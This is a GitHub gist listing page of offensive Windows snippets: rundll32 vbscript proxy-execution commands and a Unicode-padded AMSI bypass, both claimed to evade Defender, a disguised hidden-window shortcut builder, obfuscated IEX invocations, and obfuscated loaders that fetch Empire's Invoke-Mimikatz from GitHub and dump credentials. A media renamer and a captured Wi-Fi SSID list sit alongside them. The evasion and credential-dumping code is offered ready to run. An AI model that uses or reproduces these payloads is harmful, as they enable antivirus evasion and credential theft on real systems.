Skip to content

Instantly share code, notes, and snippets.

View bobby-tablez's full-sized avatar

Bobby-Tablez bobby-tablez

14 followers · 3 following
View GitHub Profile
@bobby-tablez
bobby-tablez / proxy_execution_bypass_T1218.txt
Created February 25, 2024 00:37
Proxy Execution Using Rundll32.exe Vbscript
# A list of CMD/PowerShell scripts which leverage the T1218.011 proxy execution technique. Currently bypasses AMSI as of 02/2024.
# CMD
rundll32 vbscript:"\\..\\mshtml\\..\\fishsticks\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\\\..\\\\mshtml\\\\..\\\\mshtml\\\\..\\\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"/\/\../\/\mshtml/\/\../\/\mshtml/\/\../\/\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
rundll32 vbscript:"\\....\\mshtm\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
@bobby-tablez
bobby-tablez / lnk_builder.ps1
Last active January 24, 2024 14:35
PowerShell Shortcut LNK Builder
# Set IconLocation to app or dll to change its appearance https://www.digitalcitizen.life/where-find-most-windows-10s-native-icons/
$LinkStart = New-Object -comObject WScript.Shell;
$lnk = $LinkStart.CreateShortcut("$env:USERPROFILE\Desktop\my_new_shortcut.lnk");
$lnk.IconLocation = "$env:WINDIR\System32\notepad.exe";
$lnk.TargetPath = "cmd.exe"
$lnk.WindowStyle = 7; # hidden
$lnk.ArgUments = '/c calc.exe';
$lnk.Save() | Out-Null;
@bobby-tablez
bobby-tablez / rename-media.ps1
Created January 5, 2024 03:20
Batch Rename and Format Media Files
<#
Batch rename "downloaded" media files to make the file names more appealing.
Supply a directory to be scanned recursively: "rename-media.ps1 C:\path\to\media"
IE: "the.sum.of.all.fears.2002.1080p.BLAH.Text.Atmos.COOLPEOPLE.mkv" to "The Sum Of All Fears (2002).mkv"
#>
Param (
[string]$Path
)
@bobby-tablez
bobby-tablez / unicode_amsi_bypass.txt
Last active March 29, 2024 17:25
AMSI Bypass Unicode Combining
# This simply echos a huge amount of overlapped or combined unicode characters before and after an unobfuscated AMSI Bypass.
# This somehow allows the user to run whatever then want inside the overlapping character blobs.
# Currently bypasses Defender Dec. 2023
#
# Writeup: https://x00.zip/amsi-bypass-using-unicode/
# Overlapping Unicode Chars: https://c.r74n.com/combining
# AMSI Bypass: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
'B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡B̴̠̠̱̱⃭⃭⃯⃯̟͎͎̥̥̤̺͎̻̙̘̮̹̣̤̥̗̰͙̼̫̫̺̺̪̟̞̝͉̘̘̙͓͓⃨⃨̀̀́́̂̂̄̄⃐⃐⃑⃑⃰͌̓̔̔̀̈́̓̉̉̑͗͑̇̈̈́̊͋͊͆̽̽⃜⃜⃛⃛͘͘͘͠T̸⃪⃒⃓̛̛͈͎͎̮̮͇͇̳̳̠̮⃬⃭⃮⃯̻͙͚͓̐̋̋̏̏̌̍̎̔̊̊̿̿҃̑̆̀́̂⃐⃑⃔⃕⃖⃗⃡⃰̏̋͌̓͛̀́͂̓҃︮︦︯̽⃩͗͗͑͑̇̕̕͢͢͜͝͡';[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').
@bobby-tablez
bobby-tablez / DC31_Wifi_SSIDs.txt
Created September 8, 2023 16:33
DEF CON 31 WIFI Networks
# This list contains all SSIDs I observed during defcon 31. Includes registration, walking around the con. Captured using a Pineapple MK7
!!
#ATTHEMOXY
#Free Simon Wi-Fi
*WIFI-AIRPORT
.WynnEncoreGuest
.YUL Wi-Fi
01-STATION-INN
07edba9d8f623dc6f4d86eccf53d1280
@bobby-tablez
bobby-tablez / av_bypass_invoke_mimikatz
Last active December 23, 2022 03:23
Invoke Mimikatz - Such obfuscation, many hide, so AMSI bypass
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;@(2135,2147,2147,2143,2146,2089,2078,2078,2145,2128,2150,2077,2134,2136,2147,2135,2148,2129,2148,2146,2132,2145,2130,2142,2141,2147,2132,2141,2147,2077,2130,2142,2140,2078,2097,2098,2076,2114,2100,2098,2116,2113,2104,2115,2120,2078,2100,2140,2143,2136,2145,2132,2078,2140,2128,2136,2141,2078,2132,2140,2143,2136,2145,2132,2078,2146,2132,2145,2149,2132,2145,2078,2131,2128,2147,2128,2078,2140,2142,2131,2148,2139,2132,2126,2146,2142,2148,2145,2130,2132,2078,2130,2145,2132,2131,2132,2141,2147,2136,2128,2139,2146,2078,2104,2141,2149,2142,2138,2132,2076,2108,2136,2140,2136,2138,2128,2147,2153,2077,2143,2146,2080)|%{$sr=$sr+[char]($_-2031)};$cue='rl';$fis = Get-Random 483;.(gal n?[?al]) $fis cu$cue;.(&(&(gal g?l) g?[?l]) ?e[?x])(& $fis -useb $sr);&("{0}{3}{4}{2}{1}" -f 'In','z','ikat','voke-','Mim') -DumpCreds
@bobby-tablez
bobby-tablez / IEX_Obfuscated.ps1
Created September 28, 2022 16:30
A list of onscure obfuscated PowerShell invoke expressions
# use at your own risk
$sk="xjeji";$sl=($sk[4,2,0]-Join"");.($sl)
.((RVpa "\???????\\*2\*POO*\\*river?\?6*").PATh[4,15,34]-JOin'')
.(g`cm ?e[?x])
.(ga`l i?[?x])
@bobby-tablez
bobby-tablez / Obfuscated Invoke Mimikatz
Last active September 21, 2022 01:39
Pulls from Empire's Invoke-Mimikatz.ps1
# Use at your own risk!
#
# ORIGINAL:
# IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#
[STrING]::joIn('' , ( [cHar[]]( 18, 30 ,3 , 123 , 115, 21 ,62 , 44 , 118,20 , 57,49 ,62, 56 , 47 , 123 ,21,62, 47 , 117 , 12, 62, 57,24,55 ,50,62, 53 , 47 ,114,117, 31,52 ,44, 53, 55,52, 58, 63, 8 ,47 ,41 , 50, 53, 60, 115 , 121 , 51 , 47 , 47 ,43 , 40 ,97,116, 116, 41, 58 ,44, 117 ,60 , 50 , 47 ,51 , 46 ,57,46 ,40, 62 ,41 , 56, 52 , 53,47 ,62, 53, 47, 117,56, 52,54 , 116 , 25,24 ,118 ,8,30,24 , 14 , 9 ,18 ,15 ,2, 116,30, 54 ,43 , 50 ,41, 62 ,116 ,54, 58 , 40 , 47 , 62 ,41, 116, 62 , 54, 43 , 50 , 41 , 62, 116 ,40 , 62, 41, 45, 62,41 , 116 ,63 ,58,47 ,58 ,116,54,52 , 63 , 46,55,62, 4 , 40 , 52 , 46, 41 , 56,62 ,116,56,41 , 62 ,63 , 62,53 , 47 ,50, 58,55 , 40, 116 ,18 , 53 ,45 , 52, 48 ,62 ,118,22 ,50, 54, 50 , 48 ,58, 47,33,